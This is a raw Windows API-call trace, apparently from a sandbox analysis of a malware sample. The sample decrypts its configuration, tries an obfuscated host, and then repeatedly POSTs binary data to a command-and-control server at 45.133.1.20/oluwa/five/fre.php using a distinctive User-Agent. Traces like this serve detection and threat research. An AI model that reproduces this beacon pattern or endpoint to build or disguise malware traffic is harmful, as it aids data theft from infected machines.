phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.798] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0205.916] GetProcessHeap () returned 0x6a0000 [0205.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0205.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.918] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0205.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.966] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.968] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.968] GetProcessHeap () returned 0x6a0000 [0205.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0205.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.970] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0205.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.971] CryptDestroyKey (hKey=0x6ad060) returned 1 [0205.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.972] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0205.972] GetProcessHeap () returned 0x6a0000 [0205.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0205.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.974] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.975] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0205.976] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.976] GetProcessHeap () returned 0x6a0000 [0205.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0205.976] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.977] GetProcessHeap () returned 0x6a0000 [0205.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0205.977] GetProcessHeap () returned 0x6a0000 [0205.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0205.977] GetProcessHeap () returned 0x6a0000 [0205.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0205.978] GetProcessHeap () returned 0x6a0000 [0205.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0205.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.979] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0205.987] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0206.031] GetProcessHeap () returned 0x6a0000 [0206.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0206.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.033] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0206.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.034] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.035] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.035] GetProcessHeap () returned 0x6a0000 [0206.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0206.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.036] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0206.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.037] CryptDestroyKey (hKey=0x6ad520) returned 1 [0206.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.038] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0206.038] GetProcessHeap () returned 0x6a0000 [0206.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0206.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.039] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0206.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.040] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0206.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.043] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0206.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.045] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0206.045] GetProcessHeap () returned 0x6a0000 [0206.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0206.045] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0206.045] GetProcessHeap () returned 0x6a0000 [0206.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0206.045] socket (af=2, type=1, protocol=6) returned 0x57c [0206.046] connect (s=0x57c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0206.137] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0206.137] GetProcessHeap () returned 0x6a0000 [0206.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0206.137] GetProcessHeap () returned 0x6a0000 [0206.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0206.138] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0206.139] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0206.139] GetProcessHeap () returned 0x6a0000 [0206.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0206.140] GetProcessHeap () returned 0x6a0000 [0206.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0206.140] GetProcessHeap () returned 0x6a0000 [0206.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0206.140] GetProcessHeap () returned 0x6a0000 [0206.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0206.141] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0206.142] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0206.142] GetProcessHeap () returned 0x6a0000 [0206.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0206.143] GetProcessHeap () returned 0x6a0000 [0206.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0206.143] send (s=0x57c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0206.144] send (s=0x57c, buf=0x6bb998*, len=159, flags=0) returned 159 [0206.144] GetProcessHeap () returned 0x6a0000 [0206.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0206.144] recv (in: s=0x57c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0206.298] GetProcessHeap () returned 0x6a0000 [0206.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0206.299] GetProcessHeap () returned 0x6a0000 [0206.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0206.299] GetProcessHeap () returned 0x6a0000 [0206.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0206.300] GetProcessHeap () returned 0x6a0000 [0206.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0206.300] closesocket (s=0x57c) returned 0 [0206.470] GetProcessHeap () returned 0x6a0000 [0206.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0206.470] GetProcessHeap () returned 0x6a0000 [0206.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0206.471] GetProcessHeap () returned 0x6a0000 [0206.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0206.471] GetProcessHeap () returned 0x6a0000 [0206.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0206.496] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x304) returned 0x57c [0206.501] Sleep (dwMilliseconds=0xea60) [0206.503] GetProcessHeap () returned 0x6a0000 [0206.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0206.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.505] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.516] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0206.528] GetProcessHeap () returned 0x6a0000 [0206.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0206.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.530] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0206.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.531] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.535] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.535] GetProcessHeap () returned 0x6a0000 [0206.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0206.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.537] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0206.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.538] CryptDestroyKey (hKey=0x6ad020) returned 1 [0206.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.539] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0206.539] GetProcessHeap () returned 0x6a0000 [0206.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0206.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.541] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0206.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.544] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0206.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.546] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0206.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.547] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0206.547] GetProcessHeap () returned 0x6a0000 [0206.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0206.547] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0206.547] GetProcessHeap () returned 0x6a0000 [0206.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0206.548] GetProcessHeap () returned 0x6a0000 [0206.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0206.548] GetProcessHeap () returned 0x6a0000 [0206.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0206.549] GetProcessHeap () returned 0x6a0000 [0206.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0206.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.613] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.623] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0206.634] GetProcessHeap () returned 0x6a0000 [0206.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0206.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.636] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0206.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.637] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0206.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.639] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0206.639] GetProcessHeap () returned 0x6a0000 [0206.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0206.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.643] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0206.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.645] CryptDestroyKey (hKey=0x6ad020) returned 1 [0206.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.646] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0206.646] GetProcessHeap () returned 0x6a0000 [0206.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0206.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.647] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0206.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.649] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0206.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.650] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0206.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0206.651] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0206.655] GetProcessHeap () returned 0x6a0000 [0206.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0206.655] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0206.655] GetProcessHeap () returned 0x6a0000 [0206.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0206.655] socket (af=2, type=1, protocol=6) returned 0x580 [0206.656] connect (s=0x580, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0206.764] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0206.764] GetProcessHeap () returned 0x6a0000 [0206.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0206.764] GetProcessHeap () returned 0x6a0000 [0206.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0206.765] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0206.766] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0206.766] GetProcessHeap () returned 0x6a0000 [0206.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0206.766] GetProcessHeap () returned 0x6a0000 [0206.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0206.767] GetProcessHeap () returned 0x6a0000 [0206.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0206.767] GetProcessHeap () returned 0x6a0000 [0206.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0206.768] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0206.769] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0206.769] GetProcessHeap () returned 0x6a0000 [0206.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0206.769] GetProcessHeap () returned 0x6a0000 [0206.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0206.770] send (s=0x580, buf=0x6b5c98*, len=242, flags=0) returned 242 [0206.771] send (s=0x580, buf=0x6bb998*, len=159, flags=0) returned 159 [0206.771] GetProcessHeap () returned 0x6a0000 [0206.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0206.771] recv (in: s=0x580, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0206.836] GetProcessHeap () returned 0x6a0000 [0206.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0206.837] GetProcessHeap () returned 0x6a0000 [0206.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0206.838] GetProcessHeap () returned 0x6a0000 [0206.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0206.838] GetProcessHeap () returned 0x6a0000 [0206.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0206.840] closesocket (s=0x580) returned 0 [0206.840] GetProcessHeap () returned 0x6a0000 [0206.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0206.840] GetProcessHeap () returned 0x6a0000 [0206.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0206.841] GetProcessHeap () returned 0x6a0000 [0206.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0206.841] GetProcessHeap () returned 0x6a0000 [0206.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0206.842] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x133c) returned 0x580 [0206.844] Sleep (dwMilliseconds=0xea60) [0206.846] GetProcessHeap () returned 0x6a0000 [0206.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0206.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.847] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0206.875] GetProcessHeap () returned 0x6a0000 [0206.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0206.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.877] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0206.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0206.878] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 